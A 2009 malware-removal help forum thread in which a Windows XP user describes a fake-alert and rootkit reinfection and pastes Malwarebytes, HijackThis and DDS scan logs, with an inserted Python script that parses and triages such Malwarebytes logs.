O23 - Service: ConfigFree Service (CFSvcs) - TOSHIBA CORPORATION - C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe
O23 - Service: Google Updater Service (gusvc) - Unknown owner - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe (file missing)
O23 - Service: Logitech Bluetooth Service (LBTServ) - Logitech, Inc. - C:\Program Files\Common Files\Logishrd\Bluetooth\LBTServ.exe
O23 - Service: SoundMAX Agent Service (SoundMAX Agent Service (default)) - Analog Devices, Inc. - C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe

--
End of file - 8537 bytes

I saw that error again when I tried to do a scan and log in HijackThis. It brings up an error window shortly after running a scan and then carries on after I have clicked Yes or No to send off a bug report. I haven't actually sent off a report because I didn't want to risk it interfering with the IE window I already had running (I ran HJT as I was making this post). I don't know if this error occurs because I have IE running but the error only shows up the first time and doesn't affect the scan. This time I have actually written it down and it is shown as follows (I have left out certain text outside of the error code):

An unexpected error has occurred at procedure: modRegistry_IniGetString (sFile=system.ini, sSection=boot, sValue=Shell)
Error #5 - Invalid procedure call or argument

Thank you once again for your assistance.

Regards.
  13. System information (Toshiba laptop PC, Windows XP Home, XP firewall, Internet Explorer 7, AVG 8.5 Free Edition, ZyXEL wired router) Unfortunately, my PC has once again been under attack from viruses, which is frustrating after receiving (excellent) support from AdvancedSetup to clean it. I got infected this time after clicking on a link at an image hosting site (no it was not pornography, unless you consider movie cars as such). Strangely and as chance would have it, I experienced very similar symptoms with the initial infection to what I suffered the first time I needed help at this site. No image appeared on the site and instead there was a black screen, followed by a message from Adobe Reader asking if I wanted to enable JavaScript (as I had turned it off for security reasons). I hadn't clicked on a PDF link so this was unexpected. I closed the window without allowing JavaScript to be enabled and straight away afterwards, I received a message that my XP Firewall was once again disabled. For the record, I hadn't got round to installing Online Armor Free, that AdvancedSetup recommended, as I was planning to buy new Firewall software in the next few days. I quickly re-enabled it, closed Internet Explorer and then ran CCleaner to delete all temporary files. I then examined the Temp folder in the Local Settings folder and found that two files had survived. Once again I saw a familiar file from last time, called Serr.tmp, along with another .tmp file with an unrecognisable name. Soon afterwards, more .tmp files started to appear in the Temp folder and the number continued to grow. They had various names, some longer than others. Through a state of panic and dread, I started manually trying to delete them but several were protected (I could kill a few of them though). I then realised I needed to kill my internet connection (normally this is the first thing I do but I stupidly forgot) as more and more files were being downloaded. 
Many of the files were listed as letters of the alphabet and were simply labelled: a.tmp, b.tmp, c.tmp and so on. During this, in the System Tray, an icon that looked like the Windows Security Centre red warning shield appeared. It was almost identical looking but looked a ever so slightly different in shape and colour. It kept bringing up a balloon saying that my PC had been infected by a virus. Closing it would only keep it away for a few seconds. At the same time, a window would pop-up trying to access a website. As I had switched off my router I don't know what this would have shown. I ran MBAM soon after and it successfully managed to kill multiple viruses. Using Quick Scan, it found about 6-8 viruses near the beginning of the scan and then near the end, that number went right up. Two of them could only be removed on a reboot. Upon reboot the system appeared clean and that bogus Security Centre icon had gone. I ran MBAM again, which didn't find anything. However, Windows Security Centre had been switched off, as had the firewall. I could switch the firewall back on after I received a warning that certain services had been stopped but Security Center doesn't show any status now. Nothing appears in System Tray and looking at its main window, there are no longer status panels for the firewall, Windows Updates or the Anti-Virus software. Also, on the left hand side of the window, in the Resources panel, "Change the way Security Centre alerts me" has been greyed out and disabled. CheckDisk is working fine. System Restore will let me make a new Restore Point and even allow me to load an earlier one but upon a reboot, it always says that the restore has failed. I also get an error on bootup that PadExe.exe has encountered a problem and has stopped working. Thankfully, I use a mouse so I can still use the PC but this is annoying nonetheless. Like my previous infection, I encountered this error before. 
Lastly, upon reboot, I see the Temp folder always has the same two files/folders. I can delete them manually without trouble but they always return. There is one single file called FEE5E75C.TMP and one folder called WPDNSE. The folder is always empty. They return upon every reboot but the date and time are different each time they are newly created. They do not have the current date and time that the PC has started up. I don't know if these are something malicious or not. I don't know if my system is clean and that the problems with Security Centre, System Restore and PadExe are down to damage. To be certain though, I ask again for your help. I've also realised not to visit image hosting sites in the future, no matter what the content, as it appears too risky. Seeing as I am familiar with the initial details, I have copied and pasted the MBAM log that showed the viruses, followed by a HijackThis log.

MBAM log:

Malwarebytes' Anti-Malware 1.41
Database version: 2852
Windows 5.1.2600 Service Pack 3

29/09/2009 00:27:46
mbam-log-2009-09-29 (00-27-46).txt

Scan type: Quick Scan
Objects scanned: 98412
Time elapsed: 9 minute(s), 31 second(s)

Memory Processes Infected: 3
Memory Modules Infected: 0
Registry Keys Infected: 5
Registry Values Infected: 2
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 9

Memory Processes Infected:
C:\WINDOWS\system32\net.net (Trojan.Downloader) -> Unloaded process successfully.
C:\Documents and Settings\user\Local Settings\temp\rasvsnet.tmp (Trojan.FakeAlert) -> Unloaded process successfully.
C:\WINDOWS\msa.exe (Trojan.Agent) -> Unloaded process successfully.

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
HKEY_CURRENT_USER\SOFTWARE\NordBull (Malware.Trace) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\XML (Trojan.FakeAlert) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\net (Trojan.Agent) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UACd.sys (Trojan.Agent) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\poprock (Trojan.Downloader) -> Quarantined and deleted successfully.

Registry Values Infected:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\net (Trojan.Downloader) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\poprock (Trojan.Downloader) -> Quarantined and deleted successfully.

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
C:\WINDOWS\system32\net.net (Trojan.Downloader) -> Quarantined and deleted successfully.
C:\Documents and Settings\user\Local Settings\temp\rasvsnet.tmp (Trojan.FakeAlert) -> Quarantined and deleted successfully.
C:\Documents and Settings\user\Local Settings\temp\UAC3ebf.tmp (Rootkit.TDSS) -> Delete on reboot.
C:\Documents and Settings\user\Local Settings\temp\UAC3ecf.tmp (Rootkit.TDSS) -> Quarantined and deleted successfully.
C:\Documents and Settings\user\Local Settings\temp\xomprqqowp.tmp (Rootkit.TDSS) -> Quarantined and deleted successfully.
C:\WINDOWS\msa.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\WINDOWS\Tasks\{7B02EF0B-A410-4938-8480-9BA26420A627}.job (Trojan.Downloader) -> Quarantined and deleted successfully.
C:\WINDOWS\Tasks\{BB65B0FB-5712-401b-B616-E69AC55E2757}.job (Trojan.Downloader) -> Quarantined and deleted successfully.
C:\Documents and Settings\user\Local Settings\temp\d.exe (Trojan.Downloader) -> Delete on reboot.

HijackThis log:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 04:26:57, on 29/09/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16791)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
C:\WINDOWS\System32\DRIVERS\CDANTSRV.EXE
C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe
C:\PROGRA~1\AVG\AVG8\avgrsx.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\System32\hkcmd.exe
C:\WINDOWS\System32\00THotkey.exe
C:\WINDOWS\LTSMMSG.exe
C:\Program Files\Apoint2K\Apoint.exe
C:\Program Files\TOSHIBA\TouchED\TouchED.Exe
C:\Program Files\TOSHIBA\PadTouch\PadExe.exe
C:\WINDOWS\system32\TFNF5.exe
C:\Program Files\TOSHIBA\TOSHIBA Controls\TFncKy.exe
C:\PROGRA~1\AVG\AVG8\avgtray.exe
C:\WINDOWS\system32\TPSBattM.exe
C:\Program Files\NoAds\NoAds.exe
C:\Program Files\HACE\Mmm\Mmm.exe
C:\Program Files\Apoint2K\Apntex.exe
C:\Program Files\Windows Media Player\WMPNSCFG.exe
C:\Program Files\Logitech\SetPoint\SetPoint.exe
C:\Program Files\Common Files\Microsoft Shared\Works Shared\wkcalrem.exe
C:\Program Files\GetRight\GetRight.exe
C:\Program Files\Common Files\Logishrd\KHAL2\KHALMNPR.EXE
C:\WINDOWS\system32\rundll32.exe
C:\Program Files\internet explorer\iexplore.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://home.live.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll (file missing)
O2 - BHO: IE to GetRight Helper - {31FF080D-12A3-439A-A2EF-4BA95A3148E8} - C:\Program Files\GetRight\xx2gr.dll
O2 - BHO: WormRadar.com IESiteBlocker.NavFilter - {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} - C:\Program Files\AVG\AVG8\avgssie.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll (file missing)
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\3.0.1225.9868\swg.dll (file missing)
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll (file missing)
O4 - HKLM\..\Run: [igfxTray] C:\WINDOWS\System32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\System32\hkcmd.exe
O4 - HKLM\..\Run: [00THotkey] C:\WINDOWS\System32\00THotkey.exe
O4 - HKLM\..\Run: [000StTHK] 000StTHK.exe
O4 - HKLM\..\Run: [LTSMMSG] LTSMMSG.exe
O4 - HKLM\..\Run: [Apoint] C:\Program Files\Apoint2K\Apoint.exe
O4 - HKLM\..\Run: [TouchED] C:\Program Files\TOSHIBA\TouchED\TouchED.Exe
O4 - HKLM\..\Run: [PadTouch] "C:\Program Files\TOSHIBA\PadTouch\PadExe.exe
O4 - HKLM\..\Run: [TFNF5] TFNF5.exe
O4 - HKLM\..\Run: [TPSMain] TPSMain.exe
O4 - HKLM\..\Run: [TFncKy] TFncKy.exe
O4 - HKLM\..\Run: [NeroCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [AVG8_TRAY] C:\PROGRA~1\AVG\AVG8\avgtray.exe
O4 - HKLM\..\Run: [Kernel and Hardware Abstraction Layer] KHALMNPR.EXE
O4 - HKLM\..\Run: [Malwarebytes Anti-Malware (reboot)] "C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe" /runcleanupscript
O4 - HKCU\..\Run: [NoAds] "C:\Program Files\NoAds\NoAds.exe"
O4 - HKCU\..\Run: [Mmm] "C:\Program Files\HACE\Mmm\Mmm.exe"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [WMPNSCFG] C:\Program Files\Windows Media Player\WMPNSCFG.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Logitech SetPoint.lnk = C:\Program Files\Logitech\SetPoint\SetPoint.exe
O4 - Global Startup: Microsoft Works Calendar Reminders.lnk = ?
O4 - Global Startup: Start GetRight.lnk = C:\Program Files\GetRight\GetRight.exe
O8 - Extra context menu item: Download with GetRight - C:\Program Files\GetRight\GRdownload.htm
O8 - Extra context menu item: Open with GetRight Browser - C:\Program Files\GetRight\GRbrowse.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O14 - IERESET.INF: START_PAGE_URL=file:///C:\Program Files\TOSHIBA\Free Update Service\splash.html
O16 - DPF: {215B8138-A3CF-44C5-803F-8226143CFC0A} (Trend Micro ActiveX Scan Agent 6.6) - http://housecall65.trendmicro.com/housecal...ivex/hcImpl.cab
O16 - DPF: {39B0684F-D7BF-4743-B050-FDC3F48F7E3B} - http://www.fileplanet.com/fpdlmgr/cabs/FPDC_2.3.6.108.cab
O16 - DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} (MSN Photo Upload Tool) - http://gfx1.hotmail.com/mail/w2/pr02/resources/MSNPUpld.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/...b?1238014490265
O16 - DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} - http://download.eset.com/special/eos/OnlineScanner.cab
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} (Java Runtime Environment 1.6.0) - http://dl8-cdn-01.sun.com/s/ESD44/JSCDL/jd...ows-i586-jc.cab
O16 - DPF: {A796D216-2DE1-4EA8-BABB-FE6E7C959098} (HPSDDX Class) - http://www.hp.com/cpso-support-new/SDD/hpsddObjSigned.cab
O16 - DPF: {A90A5822-F108-45AD-8482-9BC8B12DD539} (Crucial cpcScan) - http://crucial.com/controls/cpcScanner.cab
O16 - DPF: {D821DC4A-0814-435E-9820-661C543A4679} (CRLDownloadWrapper Class) - http://drmlicense.one.microsoft.com/crlupdate/en/crlocx.ocx
O18 - Protocol: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG8\avgpp.dll
O20 - Winlogon Notify: avgrsstarter - C:\WINDOWS\SYSTEM32\avgrsstx.dll
O23 - Service: AVG8 WatchDog (avg8wd) - AVG Technologies CZ, s.r.o. - C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
O23 - Service: C-DillaSrv - C-Dilla Ltd - C:\WINDOWS\System32\DRIVERS\CDANTSRV.EXE
O23 - Service: ConfigFree Service (CFSvcs) - TOSHIBA CORPORATION - C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe
O23 - Service: Google Updater Service (gusvc) - Unknown owner - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe (file missing)
O23 - Service: Logitech Bluetooth Service (LBTServ) - Logitech, Inc. - C:\Program Files\Common Files\Logishrd\Bluetooth\LBTServ.exe
O23 - Service: SoundMAX Agent Service (SoundMAX Agent Service (default)) - Analog Devices, Inc. - C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe

--
End of file - 8397 bytes

Thanks again in advance for your help and I apologise for once more taking up your time. Regards.
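A small triage script for the MBAM log format pasted in the post above, added here as an example; it is not part of the thread or of Malwarebytes' own tooling. It reads the section-by-section layout, checks the header counts against the entries actually listed (a mismatch usually means an incomplete paste), and pulls out the "Delete on reboot" items that should be confirmed gone on the next scan. The sample log is a constructed excerpt built from lines in the post.

```python
"""Parse a Malwarebytes' Anti-Malware 1.x scan log and triage its detections.

Added example, not code from the forum thread or from Malwarebytes. The log
format is the one the post pastes: summary count lines such as
'Files Infected: 9', then a section heading ending in ':', then one detection
per line as '<object> (<Threat.Name>) -> <action>.'
"""
import re
from collections import Counter
from dataclasses import dataclass

# '<object> (<Threat.Name>) -> <action>.'  (trailing full stop optional)
DETECTION_RE = re.compile(r"^(?P<obj>.+?) \((?P<threat>[^()]+)\) -> (?P<action>.+?)\.?$")
# Summary lines in the header block, e.g. 'Registry Keys Infected: 5'
HEADER_COUNT_RE = re.compile(r"^(?P<section>.+ Infected): (?P<n>\d+)$")


@dataclass(frozen=True)
class Detection:
    section: str
    obj: str
    threat: str
    action: str

    @property
    def needs_reboot(self) -> bool:
        # MBAM could not remove the object while it was in use; removal is
        # deferred to the next boot and should be verified afterwards.
        return self.action.lower().startswith("delete on reboot")


def parse_mbam_log(text: str):
    """Return (header_counts, detections) for one MBAM log."""
    header_counts = {}
    detections = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HEADER_COUNT_RE.match(line)
        if m:
            header_counts[m.group("section")] = int(m.group("n"))
            continue
        if line.endswith("Infected:"):          # section heading
            section = line[:-1]
            continue
        if line.startswith("(No malicious items detected)"):
            continue
        m = DETECTION_RE.match(line)
        if m and section:
            detections.append(Detection(section, m.group("obj"),
                                        m.group("threat"), m.group("action")))
    return header_counts, detections


def verify_counts(header_counts, detections):
    """Sections whose header count differs from the entries listed: {section: (claimed, listed)}."""
    seen = Counter(d.section for d in detections)
    return {s: (n, seen.get(s, 0)) for s, n in header_counts.items() if n != seen.get(s, 0)}


def pending_on_reboot(detections):
    """Objects MBAM only scheduled for deletion; re-check these after the restart."""
    return [d for d in detections if d.needs_reboot]


def threat_families(detections):
    """How many entries each threat name accounts for (rootkit families stand out here)."""
    return Counter(d.threat for d in detections)


# Constructed excerpt in the format of the post's log (counts match the entries below).
SAMPLE_LOG = r"""
Malwarebytes' Anti-Malware 1.41
Database version: 2852
Windows 5.1.2600 Service Pack 3

Scan type: Quick Scan
Objects scanned: 98412

Memory Processes Infected: 2
Memory Modules Infected: 0
Registry Keys Infected: 1
Registry Values Infected: 0
Files Infected: 4

Memory Processes Infected:
C:\WINDOWS\system32\net.net (Trojan.Downloader) -> Unloaded process successfully.
C:\WINDOWS\msa.exe (Trojan.Agent) -> Unloaded process successfully.

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UACd.sys (Trojan.Agent) -> Quarantined and deleted successfully.

Files Infected:
C:\WINDOWS\system32\net.net (Trojan.Downloader) -> Quarantined and deleted successfully.
C:\Documents and Settings\user\Local Settings\temp\UAC3ebf.tmp (Rootkit.TDSS) -> Delete on reboot.
C:\Documents and Settings\user\Local Settings\temp\xomprqqowp.tmp (Rootkit.TDSS) -> Quarantined and deleted successfully.
C:\Documents and Settings\user\Local Settings\temp\d.exe (Trojan.Downloader) -> Delete on reboot.
"""

if __name__ == "__main__":
    counts, found = parse_mbam_log(SAMPLE_LOG)
    print("count mismatches:", verify_counts(counts, found) or "none")
    print("threat families:", dict(threat_families(found)))
    for d in pending_on_reboot(found):
        print("verify after reboot:", d.obj)
```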
  14. Thank you for all of your help. It is greatly appreciated. I will save all the information in this thread for future use. A lot of the scanning tools that I used as previously directed, plus the ones you have just mentioned, will come in handy (I wouldn't use tools like ComboFix though unless especially directed). I was using XP's firewall because I didn't know of a good alternative. I am quite happy to buy one and I have used Norton in the past but will never use their software again as it is far too much of a burden on the computer. I will try the one you mentioned. One last thing. I have noticed on all of my DDS scans, when viewing Attach.txt, that there is some kind of IP address/DHCP error. It mentions a DHCPNACK message. I have seen this on all three logs. I did a quick Google search of this and it looks to be some kind of problem that needs looking into. Where would I go for this? Is it something I should notify my ISP about? Best regards.
  15. The Toshiba references could simply be because the name of the laptop in Windows is set as "Toshiba". I never changed it. I don't have any auto-updates activated as far as I know (unless there is something doing it without my blessing). I even have Windows Updates switched off because I prefer to have control over what my PC is supposed to be doing and what my internet connection is doing. Therefore, those references to Toshiba may just be multiple connections. Is it worth changing the computer name under Windows, even if only temporarily, to something else so you can check? Will that cause any problems if I do change the name? I have run a new DDS scan. Once again I didn't get any requests for Optional Scans. I just click on the DDS.scr icon on Desktop, it brings up a DOS box and then eventually just shows two logs and a window saying what I should do with the log files. I didn't switch off my router this time, nor did I disable it via the Network Connection icon. In other words I was still connected to the internet when I did the scan. I did disable AVG 8.5 as always though. 
DDS.txt:

DDS (Ver_09-07-30.01) - NTFSx86
Run by user at 23:58:52.03 on 21/09/2009
Internet Explorer: 7.0.5730.11
Microsoft Windows XP Home Edition 5.1.2600.3.1252.44.1033.18.1007.560 [GMT 1:00]

AV: AVG Anti-Virus Free *On-access scanning disabled* (Updated) {17DDD097-36FF-435F-9E1B-52D74245D6BF}

============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
svchost.exe
svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
C:\WINDOWS\System32\DRIVERS\CDANTSRV.EXE
C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe
C:\WINDOWS\System32\svchost.exe -k HTTPFilter
C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe
C:\PROGRA~1\AVG\AVG8\avgrsx.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\System32\00THotkey.exe
C:\WINDOWS\LTSMMSG.exe
C:\Program Files\Apoint2K\Apoint.exe
C:\Program Files\TOSHIBA\TouchED\TouchED.Exe
C:\Program Files\TOSHIBA\PadTouch\PadExe.exe
C:\WINDOWS\system32\TFNF5.exe
C:\Program Files\TOSHIBA\TOSHIBA Controls\TFncKy.exe
C:\PROGRA~1\AVG\AVG8\avgtray.exe
C:\Program Files\NoAds\NoAds.exe
C:\Program Files\HACE\Mmm\Mmm.exe
C:\Program Files\Windows Media Player\WMPNSCFG.exe
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\system32\TPSBattM.exe
C:\Program Files\Logitech\SetPoint\SetPoint.exe
C:\Program Files\Apoint2K\Apntex.exe
C:\Program Files\Common Files\Microsoft Shared\Works Shared\wkcalrem.exe
C:\Program Files\GetRight\GetRight.exe
C:\Program Files\Common Files\Logishrd\KHAL2\KHALMNPR.EXE
C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
C:\Documents and Settings\user\Desktop\dds.scr

============== Pseudo HJT Report ===============

uStart Page = hxxp://home.live.com/
uSearchMigratedDefaultURL = hxxp://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=utf8
uInternet Settings,ProxyOverride = <local>
uSearchURL,(Default) = hxxp://www.google.com/search?q=%s
BHO: Adobe PDF Reader Link Helper: {06849e9f-c8d7-4d59-b87d-784b7d6be0b3} - c:\program files\adobe\acrobat 7.0\activex\AcroIEHelper.dll
BHO: IE to GetRight Helper: {31ff080d-12a3-439a-a2ef-4ba95a3148e8} - c:\program files\getright\xx2gr.dll
BHO: AVG Safe Search: {3ca2f312-6f6e-4b53-a66e-4e65e497c8c0} - c:\program files\avg\avg8\avgssie.dll
BHO: Spybot-S&D IE Protection: {53707962-6f74-2d53-2644-206d7942484f} - c:\progra~1\spybot~1\SDHelper.dll
BHO: SSVHelper Class: {761497bb-d6f0-462c-b6eb-d4daf1d92d43} - c:\program files\java\jre1.6.0_07\bin\ssv.dll
BHO: Google Toolbar Helper: {aa58ed58-01dd-4d91-8333-cf10577473f7} - c:\program files\google\googletoolbar2.dll
BHO: Google Toolbar Notifier BHO: {af69de43-7d58-4638-b6fa-ce66b5ad205d} - c:\program files\google\googletoolbarnotifier\3.0.1225.9868\swg.dll
TB: &Google: {2318c2b1-4965-11d4-9b18-009027a5cd4f} - c:\program files\google\googletoolbar2.dll
TB: Yahoo! Toolbar: {ef99bd32-c1fb-11d2-892f-0090271d4f88} -
EB: {32683183-48a0-441b-a342-7c2a440a9478} - No File
EB: {4528BBE0-4E08-11D5-AD55-00010333D0AD} - No File
uRun: [NoAds] "c:\program files\noads\NoAds.exe"
uRun: [Mmm] "c:\program files\hace\mmm\Mmm.exe"
uRun: [WMPNSCFG] c:\program files\windows media player\WMPNSCFG.exe
uRun: [ctfmon.exe] c:\windows\system32\ctfmon.exe
mRun: [igfxTray] c:\windows\system32\igfxtray.exe
mRun: [HotKeysCmds] c:\windows\system32\hkcmd.exe
mRun: [00THotkey] c:\windows\system32\00THotkey.exe
mRun: [000StTHK] 000StTHK.exe
mRun: [LTSMMSG] LTSMMSG.exe
mRun: [Apoint] c:\program files\apoint2k\Apoint.exe
mRun: [TouchED] c:\program files\toshiba\touched\TouchED.Exe
mRun: [PadTouch] "c:\program files\toshiba\padtouch\PadExe.exe
mRun: [TFNF5] TFNF5.exe
mRun: [TPSMain] TPSMain.exe
mRun: [TFncKy] TFncKy.exe
mRun: [NeroCheck] c:\windows\system32\NeroCheck.exe
mRun: [AVG8_TRAY] c:\progra~1\avg\avg8\avgtray.exe
mRun: [Kernel and Hardware Abstraction Layer] KHALMNPR.EXE
mRun: [Malwarebytes Anti-Malware (reboot)] "c:\program files\malwarebytes' anti-malware\mbam.exe" /runcleanupscript
StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\adober~1.lnk - c:\program files\adobe\acrobat 7.0\reader\reader_sl.exe
StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\logite~1.lnk - c:\program files\logitech\setpoint\SetPoint.exe
StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\micros~2.lnk - c:\program files\common files\microsoft shared\works shared\wkcalrem.exe
StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\startg~1.lnk - c:\program files\getright\GetRight.exe
IE: Download with GetRight - c:\program files\getright\GRdownload.htm
IE: Open with GetRight Browser - c:\program files\getright\GRbrowse.htm
IE: {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe
IE: {FB5F1910-F110-11d2-BB9E-00C04F795683} - c:\program files\messenger\msmsgs.exe
IE: {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - {CAFEEFAC-0016-0000-0007-ABCDEFFEDCBC} - c:\program files\java\jre1.6.0_07\bin\ssv.dll
IE: {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - {53707962-6F74-2D53-2644-206D7942484F} - c:\progra~1\spybot~1\SDHelper.dll
DPF: {17492023-C23A-453E-A040-C7C580BBF700} - hxxp://download.microsoft.com/download/C/0/C/C0CBBA88-A6F2-48D9-9B0E-1719D1177202/LegitCheckControl.cab
DPF: {215B8138-A3CF-44C5-803F-8226143CFC0A} - hxxp://housecall65.trendmicro.com/housecall/applet/html/native/x86/win32/activex/hcImpl.cab
DPF: {39B0684F-D7BF-4743-B050-FDC3F48F7E3B} - hxxp://www.fileplanet.com/fpdlmgr/cabs/FPDC_2.3.6.108.cab
DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} - hxxp://gfx1.hotmail.com/mail/w2/pr02/resources/MSNPUpld.cab
DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} - hxxp://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1238014490265
DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} - hxxp://download.eset.com/special/eos/OnlineScanner.cab
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://dl8-cdn-01.sun.com/s/ESD44/JSCDL/jdk/6u7/jinstall-6u7-windows-i586-jc.cab?e=1222427383613&h=b8ac855f339f32209a0ec00ff741fe50/&filename=jinstall-6u7-windows-i586-jc.cab
DPF: {A796D216-2DE1-4EA8-BABB-FE6E7C959098} - hxxp://www.hp.com/cpso-support-new/SDD/hpsddObjSigned.cab
DPF: {A90A5822-F108-45AD-8482-9BC8B12DD539} - hxxp://crucial.com/controls/cpcScanner.cab
DPF: {CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_07-windows-i586.cab
